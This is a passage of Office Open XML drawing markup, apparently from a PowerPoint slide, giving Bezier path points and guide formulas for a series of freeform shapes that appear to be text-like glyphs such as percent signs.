                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="150" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="125" y="2"/>
                    <a:pt x="102" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="20" y="40"/>
                    <a:pt x="20" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="36" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="137"/>
                    <a:pt x="26" y="148"/>
                    <a:pt x="26" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="181"/>
                    <a:pt x="33" y="193"/>
                    <a:pt x="37" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="53" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="233" y="304"/>
                    <a:pt x="233" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="243"/>
                    <a:pt x="224" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="201"/>
                    <a:pt x="171" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="34" y="236"/>
                    <a:pt x="50" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="67" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="204" y="218"/>
                    <a:pt x="204" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="3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5" name="Freeform 177">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CCA207-D890-4024-8F9B-3942F3EF2F8B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4681539" y="3067050"/>
              <a:ext cx="23813" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 215"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 215"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 215"/>
                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 153 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 184 h 215"/>
                <a:gd name="T16" fmla="*/ 31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2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2" y="47"/>
                    <a:pt x="62" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="166"/>
                    <a:pt x="47" y="153"/>
                    <a:pt x="31" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12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2" y="200"/>
                    <a:pt x="62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6" name="Freeform 178">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E98F0162-E5C2-48B2-8E42-2BD34EF3F94E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4949826" y="3014663"/>
              <a:ext cx="87313" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198 w 227"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 201 w 227"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 183 w 227"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 165 w 227"/>
                <a:gd name="T7" fmla="*/ 16 h 388"/>
                <a:gd name="T8" fmla="*/ 29 w 227"/>
                <a:gd name="T9" fmla="*/ 359 h 388"/>
                <a:gd name="T10" fmla="*/ 26 w 227"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 44 w 227"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 61 w 227"/>
                <a:gd name="T15" fmla="*/ 373 h 388"/>
                <a:gd name="T16" fmla="*/ 198 w 227"/>
                <a:gd name="T17" fmla="*/ 29 h 388"/>
                <a:gd name="T18" fmla="*/ 227 w 227"/>
                <a:gd name="T19" fmla="*/ 321 h 388"/>
                <a:gd name="T20" fmla="*/ 183 w 227"/>
                <a:gd name="T21" fmla="*/ 255 h 388"/>
                <a:gd name="T22" fmla="*/ 140 w 227"/>
                <a:gd name="T23" fmla="*/ 321 h 388"/>
                <a:gd name="T24" fmla="*/ 183 w 227"/>
                <a:gd name="T25" fmla="*/ 388 h 388"/>
                <a:gd name="T26" fmla="*/ 227 w 227"/>
                <a:gd name="T27" fmla="*/ 321 h 388"/>
                <a:gd name="T28" fmla="*/ 183 w 227"/>
                <a:gd name="T29" fmla="*/ 357 h 388"/>
                <a:gd name="T30" fmla="*/ 168 w 227"/>
                <a:gd name="T31" fmla="*/ 321 h 388"/>
                <a:gd name="T32" fmla="*/ 183 w 227"/>
                <a:gd name="T33" fmla="*/ 286 h 388"/>
                <a:gd name="T34" fmla="*/ 199 w 227"/>
                <a:gd name="T35" fmla="*/ 321 h 388"/>
                <a:gd name="T36" fmla="*/ 183 w 227"/>
                <a:gd name="T37" fmla="*/ 357 h 388"/>
                <a:gd name="T38" fmla="*/ 87 w 227"/>
                <a:gd name="T39" fmla="*/ 67 h 388"/>
                <a:gd name="T40" fmla="*/ 44 w 227"/>
                <a:gd name="T41" fmla="*/ 0 h 388"/>
                <a:gd name="T42" fmla="*/ 0 w 227"/>
                <a:gd name="T43" fmla="*/ 66 h 388"/>
                <a:gd name="T44" fmla="*/ 44 w 227"/>
                <a:gd name="T45" fmla="*/ 133 h 388"/>
                <a:gd name="T46" fmla="*/ 87 w 227"/>
                <a:gd name="T47" fmla="*/ 67 h 388"/>
                <a:gd name="T48" fmla="*/ 44 w 227"/>
                <a:gd name="T49" fmla="*/ 102 h 388"/>
                <a:gd name="T50" fmla="*/ 28 w 227"/>
                <a:gd name="T51" fmla="*/ 66 h 388"/>
                <a:gd name="T52" fmla="*/ 44 w 227"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 227"/>
                <a:gd name="T55" fmla="*/ 66 h 388"/>
                <a:gd name="T56" fmla="*/ 44 w 227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8">
                  <a:moveTo>
                    <a:pt x="198" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="24"/>
                    <a:pt x="201" y="21"/>
                    <a:pt x="201" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201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4" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="388"/>
                    <a:pt x="59" y="379"/>
                    <a:pt x="61" y="373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="29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7" y="358"/>
                    <a:pt x="227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7" name="Freeform 179">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99C6949-4F8C-434B-8F2B-64AB7B69EAED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049839" y="3067050"/>
              <a:ext cx="88900" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 234"/>
                <a:gd name="T1" fmla="*/ 105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1 h 215"/>
                <a:gd name="T16" fmla="*/ 115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5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29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5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8" name="Freeform 180">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB0EEF31-D52A-47FD-AB95-0A53504DF448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183189" y="3128963"/>
              <a:ext cx="23813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49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9" name="Freeform 181">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA7ADA4-F5CE-4EDC-BE5C-BE40D9D4B293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5251451" y="3014663"/>
              <a:ext cx="87313" cy="155575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39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7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6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6 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 226"/>
                <a:gd name="T55" fmla="*/ 66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7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" name="Freeform 182">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D1E0434-B54F-4E79-BBC5-16DFAC91E0D1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349876" y="3067050"/>
              <a:ext cx="90488" cy="85725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7 w 234"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 227 w 234"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 207 w 234"/>
                <a:gd name="T9" fmla="*/ 0 h 215"/>
                <a:gd name="T10" fmla="*/ 148 w 234"/>
                <a:gd name="T11" fmla="*/ 0 h 215"/>
                <a:gd name="T12" fmla="*/ 129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4 w 234"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 103 w 234"/>
                <a:gd name="T33" fmla="*/ 105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6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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="31"/>
                    <a:pt x="227" y="31"/>
                    <a:pt x="227" y="16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9" y="0"/>
                    <a:pt x="129" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="31"/>
                    <a:pt x="140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90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4" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="105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7" y="215"/>
                    <a:pt x="99" y="215"/>
                    <a:pt x="99" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="185"/>
                    <a:pt x="89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6" y="185"/>
                    <a:pt x="136" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136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" name="Freeform 183">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51218760-E80A-4832-8FF1-A4ADC2940AEF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483226" y="3128963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" name="Freeform 184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82042F8F-B954-4C26-B61C-44CFFDBAB9CE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5551489" y="3014663"/>
              <a:ext cx="87313" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198 w 227"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 201 w 227"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 183 w 227"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 165 w 227"/>
                <a:gd name="T7" fmla="*/ 16 h 388"/>
                <a:gd name="T8" fmla="*/ 29 w 227"/>
                <a:gd name="T9" fmla="*/ 359 h 388"/>
                <a:gd name="T10" fmla="*/ 26 w 227"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 44 w 227"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 61 w 227"/>
                <a:gd name="T15" fmla="*/ 373 h 388"/>
                <a:gd name="T16" fmla="*/ 198 w 227"/>
                <a:gd name="T17" fmla="*/ 29 h 388"/>
                <a:gd name="T18" fmla="*/ 227 w 227"/>
                <a:gd name="T19" fmla="*/ 321 h 388"/>
                <a:gd name="T20" fmla="*/ 183 w 227"/>
                <a:gd name="T21" fmla="*/ 255 h 388"/>
                <a:gd name="T22" fmla="*/ 140 w 227"/>
                <a:gd name="T23" fmla="*/ 321 h 388"/>
                <a:gd name="T24" fmla="*/ 183 w 227"/>
                <a:gd name="T25" fmla="*/ 388 h 388"/>
                <a:gd name="T26" fmla="*/ 227 w 227"/>
                <a:gd name="T27" fmla="*/ 321 h 388"/>
                <a:gd name="T28" fmla="*/ 183 w 227"/>
                <a:gd name="T29" fmla="*/ 357 h 388"/>
                <a:gd name="T30" fmla="*/ 168 w 227"/>
                <a:gd name="T31" fmla="*/ 321 h 388"/>
                <a:gd name="T32" fmla="*/ 183 w 227"/>
                <a:gd name="T33" fmla="*/ 286 h 388"/>
                <a:gd name="T34" fmla="*/ 199 w 227"/>
                <a:gd name="T35" fmla="*/ 321 h 388"/>
                <a:gd name="T36" fmla="*/ 183 w 227"/>
                <a:gd name="T37" fmla="*/ 357 h 388"/>
                <a:gd name="T38" fmla="*/ 87 w 227"/>
                <a:gd name="T39" fmla="*/ 67 h 388"/>
                <a:gd name="T40" fmla="*/ 44 w 227"/>
                <a:gd name="T41" fmla="*/ 0 h 388"/>
                <a:gd name="T42" fmla="*/ 0 w 227"/>
                <a:gd name="T43" fmla="*/ 66 h 388"/>
                <a:gd name="T44" fmla="*/ 44 w 227"/>
                <a:gd name="T45" fmla="*/ 133 h 388"/>
                <a:gd name="T46" fmla="*/ 87 w 227"/>
                <a:gd name="T47" fmla="*/ 67 h 388"/>
                <a:gd name="T48" fmla="*/ 44 w 227"/>
                <a:gd name="T49" fmla="*/ 102 h 388"/>
                <a:gd name="T50" fmla="*/ 28 w 227"/>
                <a:gd name="T51" fmla="*/ 66 h 388"/>
                <a:gd name="T52" fmla="*/ 44 w 227"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 227"/>
                <a:gd name="T55" fmla="*/ 66 h 388"/>
                <a:gd name="T56" fmla="*/ 44 w 227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8">
                  <a:moveTo>
                    <a:pt x="198" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="24"/>
                    <a:pt x="201" y="21"/>
                    <a:pt x="201" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201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4" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="388"/>
                    <a:pt x="59" y="379"/>
                    <a:pt x="61" y="373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="29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9" y="255"/>
                    <a:pt x="140" y="284"/>
                    <a:pt x="140" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="358"/>
                    <a:pt x="159" y="388"/>
                    <a:pt x="183" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="388"/>
                    <a:pt x="227" y="358"/>
                    <a:pt x="227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" name="Freeform 185">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EFB115-76C5-4E02-9DE0-F1510458BEF7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5651501" y="3067050"/>
              <a:ext cx="88900" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 130 w 234"/>
                <a:gd name="T1" fmla="*/ 105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" name="Freeform 186">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B04744-8773-4FEF-9CFB-3BAE7E84BEAC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784851" y="3128963"/>
              <a:ext cx="23813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" name="Freeform 187">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2245489D-5577-4B89-848D-D6DD3D00CF65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853114" y="3014663"/>
              <a:ext cx="87313" cy="155575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40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8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6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6 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 226"/>
                <a:gd name="T55" fmla="*/ 66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6" name="Freeform 188">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB8958AE-3847-419D-B6B1-AA34593BC1A1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951539" y="3067050"/>
              <a:ext cx="90488" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 233"/>
                <a:gd name="T1" fmla="*/ 105 h 215"/>
                <a:gd name="T2" fmla="*/ 186 w 233"/>
                <a:gd name="T3" fmla="*/ 31 h 215"/>
                <a:gd name="T4" fmla="*/ 206 w 233"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 226 w 233"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 206 w 233"/>
                <a:gd name="T9" fmla="*/ 0 h 215"/>
                <a:gd name="T10" fmla="*/ 148 w 233"/>
                <a:gd name="T11" fmla="*/ 0 h 215"/>
                <a:gd name="T12" fmla="*/ 128 w 233"/>
                <a:gd name="T13" fmla="*/ 15 h 215"/>
                <a:gd name="T14" fmla="*/ 152 w 233"/>
                <a:gd name="T15" fmla="*/ 31 h 215"/>
                <a:gd name="T16" fmla="*/ 115 w 233"/>
                <a:gd name="T17" fmla="*/ 81 h 215"/>
                <a:gd name="T18" fmla="*/ 77 w 233"/>
                <a:gd name="T19" fmla="*/ 31 h 215"/>
                <a:gd name="T20" fmla="*/ 101 w 233"/>
                <a:gd name="T21" fmla="*/ 15 h 215"/>
                <a:gd name="T22" fmla="*/ 81 w 233"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 23 w 233"/>
                <a:gd name="T25" fmla="*/ 0 h 215"/>
                <a:gd name="T26" fmla="*/ 3 w 233"/>
                <a:gd name="T27" fmla="*/ 16 h 215"/>
                <a:gd name="T28" fmla="*/ 23 w 233"/>
                <a:gd name="T29" fmla="*/ 31 h 215"/>
                <a:gd name="T30" fmla="*/ 43 w 233"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 102 w 233"/>
                <a:gd name="T33" fmla="*/ 105 h 215"/>
                <a:gd name="T34" fmla="*/ 40 w 233"/>
                <a:gd name="T35" fmla="*/ 185 h 215"/>
                <a:gd name="T36" fmla="*/ 20 w 233"/>
                <a:gd name="T37" fmla="*/ 185 h 215"/>
                <a:gd name="T38" fmla="*/ 0 w 233"/>
                <a:gd name="T39" fmla="*/ 200 h 215"/>
                <a:gd name="T40" fmla="*/ 20 w 233"/>
                <a:gd name="T41" fmla="*/ 215 h 215"/>
                <a:gd name="T42" fmla="*/ 78 w 233"/>
                <a:gd name="T43" fmla="*/ 215 h 215"/>
                <a:gd name="T44" fmla="*/ 98 w 233"/>
                <a:gd name="T45" fmla="*/ 200 h 215"/>
                <a:gd name="T46" fmla="*/ 72 w 233"/>
                <a:gd name="T47" fmla="*/ 185 h 215"/>
                <a:gd name="T48" fmla="*/ 115 w 233"/>
                <a:gd name="T49" fmla="*/ 124 h 215"/>
                <a:gd name="T50" fmla="*/ 160 w 233"/>
                <a:gd name="T51" fmla="*/ 185 h 215"/>
                <a:gd name="T52" fmla="*/ 135 w 233"/>
                <a:gd name="T53" fmla="*/ 200 h 215"/>
                <a:gd name="T54" fmla="*/ 155 w 233"/>
                <a:gd name="T55" fmla="*/ 215 h 215"/>
                <a:gd name="T56" fmla="*/ 213 w 233"/>
                <a:gd name="T57" fmla="*/ 215 h 215"/>
                <a:gd name="T58" fmla="*/ 233 w 233"/>
                <a:gd name="T59" fmla="*/ 200 h 215"/>
                <a:gd name="T60" fmla="*/ 213 w 233"/>
                <a:gd name="T61" fmla="*/ 185 h 215"/>
                <a:gd name="T62" fmla="*/ 193 w 233"/>
                <a:gd name="T63" fmla="*/ 185 h 215"/>
                <a:gd name="T64" fmla="*/ 129 w 233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15">
                  <a:moveTo>
                    <a:pt x="129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6" y="31"/>
                    <a:pt x="226" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="0"/>
                    <a:pt x="213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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="31"/>
                    <a:pt x="101" y="31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8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2" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115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3" y="215"/>
                    <a:pt x="233" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="185"/>
                    <a:pt x="220" y="185"/>
                    <a:pt x="213" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="193" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129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7" name="Freeform 189">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13AB772E-34AC-44A7-986B-BEC3FEB97119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084889" y="3128963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8" name="Freeform 190">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E5AA8C-F5D6-4CF8-AFE9-657C380BD1AB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6154739" y="3014663"/>
              <a:ext cx="85725" cy="155575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0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39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7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6 w 226"/>
                <a:gd name="T39" fmla="*/ 67 h 388"/>
                <a:gd name="T40" fmla="*/ 43 w 226"/>
                <a:gd name="T41" fmla="*/ 0 h 388"/>
                <a:gd name="T42" fmla="*/ 0 w 226"/>
                <a:gd name="T43" fmla="*/ 66 h 388"/>
                <a:gd name="T44" fmla="*/ 43 w 226"/>
                <a:gd name="T45" fmla="*/ 133 h 388"/>
                <a:gd name="T46" fmla="*/ 86 w 226"/>
                <a:gd name="T47" fmla="*/ 67 h 388"/>
                <a:gd name="T48" fmla="*/ 43 w 226"/>
                <a:gd name="T49" fmla="*/ 102 h 388"/>
                <a:gd name="T50" fmla="*/ 28 w 226"/>
                <a:gd name="T51" fmla="*/ 66 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 58 w 226"/>
                <a:gd name="T55" fmla="*/ 66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7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8" y="379"/>
                    <a:pt x="60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6" y="67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="86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7" y="133"/>
                    <a:pt x="86" y="104"/>
                    <a:pt x="86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49" y="31"/>
                    <a:pt x="58" y="46"/>
                    <a:pt x="58" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58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9" name="Freeform 191">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18264E0B-3E0E-441A-B766-606904FF2669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253164" y="3067050"/>
              <a:ext cx="88900" cy="85725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7 w 234"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 227 w 234"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 207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4 w 234"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 102 w 234"/>
                <a:gd name="T33" fmla="*/ 105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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="31"/>
                    <a:pt x="227" y="31"/>
                    <a:pt x="227" y="16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4" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="105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0" name="Freeform 192">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD854ED3-47E8-4B12-9B5C-B968AC9A4461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386514" y="3128963"/>
              <a:ext cx="23813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1" name="Freeform 193">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B757B647-C4B2-4252-B378-C0515A52C078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6454776" y="3014663"/>
              <a:ext cx="87313" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198 w 227"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 201 w 227"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 183 w 227"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 165 w 227"/>
                <a:gd name="T7" fmla="*/ 16 h 388"/>
                <a:gd name="T8" fmla="*/ 29 w 227"/>
                <a:gd name="T9" fmla="*/ 359 h 388"/>
                <a:gd name="T10" fmla="*/ 26 w 227"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 44 w 227"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 61 w 227"/>
                <a:gd name="T15" fmla="*/ 373 h 388"/>
                <a:gd name="T16" fmla="*/ 198 w 227"/>
                <a:gd name="T17" fmla="*/ 29 h 388"/>
                <a:gd name="T18" fmla="*/ 227 w 227"/>
                <a:gd name="T19" fmla="*/ 321 h 388"/>
                <a:gd name="T20" fmla="*/ 183 w 227"/>
                <a:gd name="T21" fmla="*/ 255 h 388"/>
                <a:gd name="T22" fmla="*/ 140 w 227"/>
                <a:gd name="T23" fmla="*/ 321 h 388"/>
                <a:gd name="T24" fmla="*/ 183 w 227"/>
                <a:gd name="T25" fmla="*/ 388 h 388"/>
                <a:gd name="T26" fmla="*/ 227 w 227"/>
                <a:gd name="T27" fmla="*/ 321 h 388"/>
                <a:gd name="T28" fmla="*/ 183 w 227"/>
                <a:gd name="T29" fmla="*/ 357 h 388"/>
                <a:gd name="T30" fmla="*/ 168 w 227"/>
                <a:gd name="T31" fmla="*/ 321 h 388"/>
                <a:gd name="T32" fmla="*/ 183 w 227"/>
                <a:gd name="T33" fmla="*/ 286 h 388"/>
                <a:gd name="T34" fmla="*/ 199 w 227"/>
                <a:gd name="T35" fmla="*/ 321 h 388"/>
                <a:gd name="T36" fmla="*/ 183 w 227"/>
                <a:gd name="T37" fmla="*/ 357 h 388"/>
                <a:gd name="T38" fmla="*/ 87 w 227"/>
                <a:gd name="T39" fmla="*/ 67 h 388"/>
                <a:gd name="T40" fmla="*/ 44 w 227"/>
                <a:gd name="T41" fmla="*/ 0 h 388"/>
                <a:gd name="T42" fmla="*/ 0 w 227"/>
                <a:gd name="T43" fmla="*/ 66 h 388"/>
